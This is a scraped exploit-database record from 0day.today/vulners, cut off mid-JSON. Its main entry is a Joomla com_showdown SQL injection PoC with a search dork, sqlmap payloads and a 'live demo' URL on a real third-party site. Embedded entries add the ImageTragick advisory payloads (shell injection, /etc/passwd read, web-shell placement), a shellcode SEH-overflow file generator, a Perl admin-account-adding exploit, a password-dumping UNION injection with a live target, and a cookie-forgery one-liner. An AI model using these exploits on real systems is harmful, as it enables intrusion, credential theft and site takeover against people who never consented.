ID 1337DAY-ID-25286 Type zdt Reporter xBADGIRL21 Modified 2016-10-04T00:00:00
Description
Exploit for php platform in category web applications
######################
# Exploit Title : Joomla com_showdown SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_showdown
# version : 1.5.0
# Tested on: [ Windows 7 ]
# skype:xbadgirl21
# Date: 2016/07/24
# video Proof : https://youtu.be/IglNYsDcV3g
######################
# [+] DESCRIPTION :
######################
# [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or
# [+] You Will Notice a change in the Frontpage of the target .
######################
# [+] Poc :
######################
# [typeid] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]
######################
# [+] SQLmap PoC:
######################
# GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
#
# Parameter: typeid (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_showdown&typeid=11 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 6 columns
# Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870
# 43554447614a527451564c,0x71706a7171),NULL-- LZga
# ---
# [12:59:46] [INFO] the back-end DBMS is MySQL
# web server operating system: Linux Debian 6.0 (squeeze)
# web application technology: PHP 5.2.6, Apache 2.2.16
# back-end DBMS: MySQL >= 5.0.12
# [12:59:46] [INFO] fetching database names
# available databases [3]:
######################
# [+] Live Demo :
######################
# http://www.circuse.eu/index.php?option=com_showdown&typeid=11
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
# 0day.today [2018-03-19] #
{"hash": "ceab06089d0a39dc6e56b612feb81e6ed6cc6b036a67d02aad88eaad26b48791", "id": "1337DAY-ID-25286", "lastseen": "2018-03-19T09:10:04", "viewCount": 9, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "50cf7018f83072e4d341dee8585dc49c", "key": "href"}, {"hash": "874bc1e4a5cb164285fb16be0c74e311", "key": "modified"}, {"hash": "874bc1e4a5cb164285fb16be0c74e311", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "182369e088a70351af68e956335cbea7", "key": "reporter"}, {"hash": "0c7ef3f885d48945f81148730d5e34f1", "key": "sourceData"}, {"hash": "47bfc591ecda7f90552bb9269039d232", "key": "sourceHref"}, {"hash": "0b7d93c9d29fd82338c881d90341e37b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-7888", "1337DAY-ID-3718", "1337DAY-ID-3716", "1337DAY-ID-3715", "1337DAY-ID-3714", "1337DAY-ID-3717", "1337DAY-ID-640", "1337DAY-ID-480"]}], "modified": "2018-03-19T09:10:04"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/25286", "description": "Exploit for php platform in category web applications", "title": "Joomla com_showdown SQL injection Vulnerability", "history": [{"bulletin": {"hash": "5549e480c646c975021f541b0f91e1dd8353c105d53f1154fb262b89b6ae5f8e", "id": "1337DAY-ID-25286", "lastseen": "2016-05-06T12:58:53", "enchantments": {"score": null}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a3db30bdcf577b97b6ab1681326dd4cb", "key": "reporter"}, {"hash": "a29d9a5bcca6ef6c93e6d74d747cbdd2", "key": "title"}, {"hash": "4082ad91824470f19dc0cbead2781419", "key": "sourceData"}, {"hash": "adbba660b8ed76ff97dd2b28b99ddf97", "key": "cvelist"}, {"hash": "112b4689d9fb530b28a42b83739a359e", "key": "href"}, {"hash": "26f0c7701a3922583d7f10de7e1f6bba", "key": "sourceHref"}, {"hash": "13f4c3ea99a9d71a729f1d00e5b614d9", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}, {"hash": "13f4c3ea99a9d71a729f1d00e5b614d9", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/25286", "description": "Exploit for multiple platform in category dos / poc", "viewCount": 4, "title": "ImageMagick 6.9.3-9 - Multiple Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\r\nvulnerabilities in ImageMagick.\r\nWe've reported these issues to developers of ImageMagick and they made a\r\nfix for RCE in sources and released new version (6.9.3-9 released\r\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\r\nfix seems to be incomplete. We are still working with developers.\r\n \r\nImageMagick: Multiple vulnerabilities in image decoder\r\n \r\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\r\n(potentially remote) code execution\r\n \r\nInsufficient filtering for filename passed to delegate's command allows\r\nremote code execution during conversion of several file formats.\r\n \r\nImageMagick allows to process files with external libraries. This\r\nfeature is called 'delegate'. It is implemented as a system() with\r\ncommand string ('command') from the config file delegates.xml with\r\nactual value for different params (input/output filenames etc). Due to\r\ninsufficient %M param filtering it is possible to conduct shell command\r\ninjection. One of the default delegate's command is used to handle https\r\nrequests:\r\n\"wget\" -q -O \"%o\" \"https:%M\"\r\nwhere %M is the actual link from the input. It is possible to pass the\r\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\r\n-la'. (wget or curl should be installed)\r\n \r\n$ convert 'https://example.com\"|ls \"-la' out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\n \r\nThe most dangerous part is ImageMagick supports several formats like\r\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\r\nthis file format and idea of the local file read vulnerability in\r\nImageMagick, see below), maybe some others - which allow to include\r\nexternal files from any supported protocol including delegates. As a\r\nresult, any service, which uses ImageMagick to process user supplied\r\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\r\nthis issue.\r\n \r\nexploit.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\r\npop graphic-context\r\n \r\nexploit.svg\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\r\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\r\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\r\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\r\n\"http://www.w3.org/1999/xlink\">\r\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\r\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\r\n</svg>\r\n \r\n$ convert exploit.mvg out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\nImageMagick tries to guess the type of the file by it's content, so\r\nexploitation doesn't depend on the file extension. You can rename\r\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\r\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\r\nbe used as a protection to filter file by it's content and creates\r\nadditional attack vectors (e.g. via 'less exploit.jpg', because\r\n'identify' is invoked via lesspipe.sh).\r\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\r\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\r\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\r\n(or curl) should be installed on the system for successful PoC\r\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\r\n \r\nAll other issues also rely on dangerous ImageMagick feature of external\r\nfiles inclusion from any supported protocol in formats like svg and mvg.\r\n \r\n2. CVE-2016-3718 - SSRF\r\nIt is possible to make HTTP GET or FTP request:\r\n \r\nssrf.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n \r\n$ convert ssrf.mvg out.png # makes http request to example.com\r\n \r\n3. CVE-2016-3715 - File deletion\r\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\r\nprotocol which deletes files after reading:\r\n \r\ndelete_file.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n \r\n$ touch /tmp/delete.txt\r\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\r\n \r\n4. CVE-2016-3716 - File moving\r\nIt is possible to move image files to file with any extension in any\r\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\r\nimage.gif should exist in known location - /tmp/ for PoC (in real life\r\nit may be web service written in PHP, which allows to upload raw txt\r\nfiles and process images with ImageMagick):\r\n \r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n \r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n \r\n/tmp/image.gif - image with php shell inside\r\n(https://www.secgeek.net/POC/POC.gif for example)\r\n \r\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\r\n \r\n5. CVE-2016-3717 - Local file read (independently reported by original\r\nresearch author - https://hackerone.com/stewie)\r\nIt is possible to get content of the files from the server by using\r\nImageMagick's 'label' pseudo protocol:\r\n \r\nfile_read.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@...c/passwd'\r\npop graphic-context\r\n \r\n$ convert file_read.mvg out.png # produces file with text rendered from\r\n/etc/passwd\r\n \r\n \r\nHow to mitigate the vulnerability.\r\n \r\nAvailable patches appear to be incomplete.\r\nIf you use ImageMagick or an affected library, we recommend you mitigate\r\nthe known vulnerabilities by doing at least one these two things (but\r\npreferably both!):\r\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\r\ncorresponding to the image file types you support before sending them to\r\nImageMagick for processing. (see FAQ for more info)\r\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\r\nglobal policy for ImageMagick is usually found in \ufffd/etc/ImageMagick\ufffd.\r\nThis policy.xml example will disable the coders EPHEMERAL, URL, MVG, and\r\nMSL:\r\n \r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n \r\n \r\nVulnerability Disclosure Timeline:\r\nApril, 21 2016 - file read vulnerability report for one of My.Com\r\nservices from https://hackerone.com/stewie received by Mail.Ru Security\r\nTeam. Issue is reportedly known to ImageMagic team.\r\nApril, 21 2016 - file read vulnerability patched by My.Com development team\r\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\r\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\r\noriginal report\r\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\r\ndevelopment team\r\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\r\n(incomplete fix)\r\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\r\nMay, 1 2016 - ImageMagic informed of the fix bypass\r\nMay, 2 2016 - limited disclosure to 'distros' mailing list\r\nMay, 3 2016 - public disclosure at https://imagetragick.com/\n\n# 0day.today [2016-05-06] #", "published": "2016-05-04T00:00:00", "references": [], "reporter": "Nikolay Ermishkin", "modified": "2016-05-04T00:00:00", "href": "http://0day.today/exploit/description/25286"}, "lastseen": "2016-05-06T12:58:53", "edition": 1, "differentElements": ["description", "cvelist", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "######################\r\n# Exploit Title : Joomla com_showdown SQL injection Vulnerability\r\n# Exploit Author : xBADGIRL21\r\n# Dork : inurl:index.php?option=com_showdown\r\n# version : 1.5.0\r\n# Tested on: [ Windows 7 ]\r\n# skype:xbadgirl21\r\n# Date: 2016/07/24\r\n# video Proof : https://youtu.be/IglNYsDcV3g\r\n######################\r\n# [+] DESCRIPTION :\r\n######################\r\n# [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or [\"] to\r\n# [+] Vuln Target Parameter you will get error like :\r\n# [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or\r\n# [+] You Will Notice a change in the Frontpage of the target .\r\n######################\r\n# [+] Poc :\r\n######################\r\n# [typeid] Get Parameter Vulnerable To SQLi\r\n# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]\r\n######################\r\n# [+] SQLmap PoC:\r\n######################\r\n# GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]\r\n#\r\n# Parameter: typeid (GET)\r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: option=com_showdown&typeid=11 AND SLEEP(5)\r\n#\r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 6 columns\r\n# Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870\r\n# 43554447614a527451564c,0x71706a7171),NULL-- LZga\r\n# ---\r\n# [12:59:46] [INFO] the back-end DBMS is MySQL\r\n# web server operating system: Linux Debian 6.0 (squeeze)\r\n# web application technology: PHP 5.2.6, Apache 2.2.16\r\n# back-end DBMS: MySQL >= 5.0.12\r\n# [12:59:46] [INFO] fetching database names\r\n# available databases [3]:\r\n######################\r\n# [+] Live Demo :\r\n######################\r\n# http://www.circuse.eu/index.php?option=com_showdown&typeid=11\r\n######################\r\n# Discovered by : xBADGIRL21\r\n# Greetz : All Mauritanien Hackers - NoWhere\r\n######################\n\n# 0day.today [2018-03-19] #", "published": "2016-10-04T00:00:00", "references": [], "reporter": "xBADGIRL21", "modified": "2016-10-04T00:00:00", "href": "https://0day.today/exploit/description/25286"}
{"joomla": [{"lastseen": "2019-04-13T18:54:33", "bulletinFamily": "software", "description": "Inadequate filtering of request data leads to a SQL Injection vulnerability.\n", "modified": "2015-12-21T00:00:00", "published": "2015-12-21T00:00:00", "href": "https://developer.joomla.org/security-centre/640-20151207-core-sql-injection.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-640", "type": "joomla", "title": "[20151207] - Core - SQL Injection", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "www.eVuln.com advisory:\r\nHTTP Response Splitting in WWWThreads (php version)\r\nSummary: http://evuln.com/vulns/156/summary.html \r\nDetails: http://evuln.com/vulns/156/description.html \r\n\r\n-----------Summary-----------\r\neVuln ID: EV0156\r\nSoftware: n/a\r\nVendor: WWWThreads\r\nVersion: 2006.11.25\r\nCritical Level: low\r\nType: HTTP Response Splitting\r\nStatus: Unpatched. No reply from developer(s)\r\nPoC: Available\r\nSolution: Not available\r\nDiscovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )\r\n--------Description--------\r\n$_SERVER["HTTP_REFERER"] value is included in an HTTP response header sent to a\r\nweb user without being validated for malicious characters.\r\nVulnerable script: reputation.php\r\n--------PoC/Exploit--------\r\nPoC code is available at:\r\nhttp://evuln.com/vulns/156/exploit.html \r\n---------Solution----------\r\nNot available\r\n----------Credit-----------\r\nVulnerability discovered by Aliaksandr Hartsuyeu\r\nhttp://evuln.com/sql-injection/cookie.html - recent advisories about sql\r\ninjections in cookies", "modified": "2010-12-12T00:00:00", "published": "2010-12-12T00:00:00", "id": "SECURITYVULNS:DOC:25286", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25286", "title": "www.eVuln.com : HTTP Response Splitting in WWWThreads (php version)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-04T05:15:28", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-03-05T00:00:00", "published": "2009-03-05T00:00:00", "id": "1337DAY-ID-7888", "href": "https://0day.today/exploit/description/7888", "type": "zdt", "title": "Media Commands (m3u File) Universal SEH Overwrite Exploit", "sourceData": "=========================================================\r\nMedia Commands (m3u File) Universal SEH Overwrite Exploit\r\n=========================================================\r\n\r\n\r\n#usage: exploit.py\r\nprint \"**************************************************************************\"\r\nprint \" Media Commands (m3u File) Universal Seh Overwrite Exploit\\n\"\r\nprint \" Founder: Hakxer\"\r\nprint \" Exploited by : His0k4\"\r\nprint \" Another Exploiter : Stack\"\r\nprint \" Tested on: Windows XP Pro SP2 Fr\\n\"\r\nprint \" Greetings to:\"\r\nprint \" All friends & muslims HaCkers(dz)\\n\"\r\nprint \"**************************************************************************\"\r\n \t\r\n\r\n\t\t\t\r\n\t\t\t\r\nbuff = \"\\x41\" * 4103\r\n\r\nnext_seh = \"\\xEB\\x06\\x90\\x90\" \r\n\r\nseh = \"\\x9F\\x20\\x01\\x10\" #Universal pop pop ret :p\r\n\r\n\r\nnop = \"\\x90\" * 19\r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\nshellcode = (\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x48\\x45\\x34\\x4e\\x53\\x4b\\x48\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x37\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x33\\x4b\\x38\"\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\"\r\n\"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x58\"\r\n\"\\x4f\\x55\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54\"\r\n\"\\x4b\\x38\\x4f\\x45\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x48\"\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x55\\x46\\x42\\x46\\x50\\x43\\x4c\\x41\\x43\"\r\n\"\\x42\\x4c\\x46\\x56\\x4b\\x58\\x42\\x54\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x47\"\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x34\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\"\r\n\"\\x4b\\x58\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x58\\x42\\x38\\x42\\x4b\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x38\\x4a\\x46\\x4e\\x43\\x4f\\x45\\x41\\x53\"\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\"\r\n\"\\x42\\x45\\x4a\\x56\\x42\\x4f\\x4c\\x38\\x46\\x50\\x4f\\x35\\x4a\\x56\\x4a\\x59\"\r\n\"\\x50\\x4f\\x4c\\x48\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x36\"\r\n\"\\x4e\\x36\\x43\\x36\\x42\\x50\\x5a\"\r\n )\r\n\r\nexploit = buff + next_seh + seh + nop + shellcode\r\n\r\ntry:\r\n out_file = open(\"exploit.m3u\",'w')\r\n out_file.write(exploit)\r\n out_file.close()\r\n print \"Exploit File Created!\"\r\nexcept:\r\n print \"Error\"\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7888"}, {"lastseen": "2018-04-11T21:53:06", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-22T00:00:00", "published": "2008-09-22T00:00:00", "id": "1337DAY-ID-3718", "href": "https://0day.today/exploit/description/3718", "type": "zdt", "title": "WCMS v.1.0b Arbitrary Add Admin Exploit", "sourceData": "=======================================\r\nWCMS v.1.0b Arbitrary Add Admin Exploit\r\n=======================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#=================================================\r\n# WCMS v.1.0b Arbitrary Add Admin Exploit\r\n#=================================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 22 September 2008\r\n#\r\n#\r\n#####################################################\r\n#APPLICATION : WCMS: Web Content Management System\r\n#VERSION : v.1.0b\r\n######################################################\r\n#\r\n#Note: magic_quotes_gpc = off\r\n#\r\n#This Exploit will Add user to Administrator's Privilege.\r\n#\r\n#####################################################################\r\n# Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos \r\n# Special Thx : asylu3, str0ke, citec.us, milw0rm.com\r\n#####################################################################\r\n\r\nuse LWP;\r\nuse HTTP::Request;\r\nuse HTTP::Cookies;\r\n\r\nprint \"\\n==================================================\\n\";\r\nprint \" WCMS v.1.0b Arbitrary Add Admin Exploit \\n\";\r\nprint \" \\n\";\r\nprint \" Discovered By CWH Underground \\n\";\r\nprint \"==================================================\\n\";\r\nprint \" \\n\";\r\nprint \" ,--^----------,--------,-----,-------^--, \\n\";\r\nprint \" | ||||||||| `--------' | O\t\\n\";\r\nprint \" `+---------------------------^----------| \\n\";\r\nprint \" `\\_,-------, _________________________| \\n\";\r\nprint \" / XXXXXX /`| / \\n\";\r\nprint \" / XXXXXX / `\\ / \\n\";\r\nprint \" / XXXXXX /\\______( \\n\";\r\nprint \" / XXXXXX / \\n\";\r\nprint \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\nprint \" (________( \\n\";\r\nprint \" `------' \\n\";\r\nprint \" \\n\";\r\n\r\nif ($#ARGV + 1 != 3)\r\n{\r\n print \"Usage: ./xpl.pl <Target URL> <user> <pass>\\n\";\r\n print \"Ex. ./xpl.pl http://www.target.com/admin/ cwhuser cwhpass\\n\";\r\n exit();\r\n}\r\n\r\n$blogurl = $ARGV[0];\r\n$user = $ARGV[1];\r\n$pass = $ARGV[2];\r\n\r\n$loginurl = $blogurl.\"index.asp\";\r\n$adduserurl = $blogurl.\"change_password.asp\";\r\n$post_content = \"user=\".$user.\"&pass=\".$pass.\"&pass1=\".$pass.\"&Submit=---+CHANGE+---\";\r\n\r\n\r\nprint \"\\n..::Login Page URL::..\\n\";\r\nprint \"$loginurl\";\r\nprint \"\\n..::Add User Page URL::..\\n\";\r\nprint \"$adduserurl\\n\\n\";\r\nprint \"..::Login Process::..\\n\";\r\n\r\n$ua = LWP::UserAgent->new;\r\n$ua->cookie_jar(HTTP::Cookies->new);\r\n$request = HTTP::Request->new (POST => $loginurl);\r\n$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ('user=admin&d_log=login&password=\\'+or+\\'a\\'=\\'a&imageField.x=0&imageField.y=0'); \r\n$response = $ua->request($request);\r\n$location = $response -> header('Location');\r\n\r\nprint \"\\n[+]Result :: \";\r\n\r\nif ($location =~ /admin_main.asp/)\r\n{\r\n print \"Login Success!!!\\n\";\r\n}\r\nelse\r\n{\r\n print \"Login Failed!!!\\n\";\r\n exit();\r\n}\r\n\r\nprint \"\\n..::Add Admin Exploit::..\\n\";\r\n$request = HTTP::Request->new (POST => $adduserurl);\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ($post_content);\r\n$response = $ua->request($request);\r\n\r\n print \"\\n[+]Result\\n\";\r\n print \"Username :: \".$user.\"\\n\";\r\n print \"Password :: \".$pass.\"\\n\";\r\n print \"Role :: Administrator\\n\";\r\n print \"\\nEnjoy with Bugs ;)\"\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3718"}, {"lastseen": "2018-03-14T19:26:16", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-21T00:00:00", "published": "2008-09-21T00:00:00", "id": "1337DAY-ID-3717", "href": "https://0day.today/exploit/description/3717", "type": "zdt", "title": "Availscript Article Script (view.php v) SQL Injection Vulnerability", "sourceData": "===================================================================\r\nAvailscript Article Script (view.php v) SQL Injection Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\n|___________________________________________________|\r\n|\r\n| Article Script (view.php v ) Remote SQL Injection Vulnerability\r\n|\r\n|___________________________________________________\r\n|---------------------Hussin X----------------------|\r\n|\r\n| Author: Hussin X\r\n|\r\n|___________________________________________________\r\n| |\r\n|\r\n| script : http://www.availscript.com/article_script.php\r\n|\r\n| DorK : :)\r\n|___________________________________________________|\r\n\r\n\r\n\r\nExploit:\r\n________\r\n\r\n\r\n\r\nwww.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--\r\n\r\n\r\n\r\nL!VE DEMO:\r\n\r\n\r\nhttp://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--\r\n\r\n\r\n\r\nLogin :\r\n\r\nwww.[target].com/Script/admin/login.php\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3717"}, {"lastseen": "2018-04-10T00:30:20", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-21T00:00:00", "published": "2008-09-21T00:00:00", "id": "1337DAY-ID-3716", "href": "https://0day.today/exploit/description/3716", "type": "zdt", "title": "Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability ", "sourceData": "=============================================================\r\nRianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability \r\n=============================================================\r\n\r\n\r\n###############################################################################################\r\n[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability\r\n[+] Discovered By Stack \r\n[+] Greetz : All my freind \r\n################################################################################################\r\n---\r\nexploit:\r\njavascript:document.cookie = \"usuario=1; path=/\"; document.cookie = \"pass=1; path=/\";\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3716"}, {"lastseen": "2018-03-05T23:32:18", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-21T00:00:00", 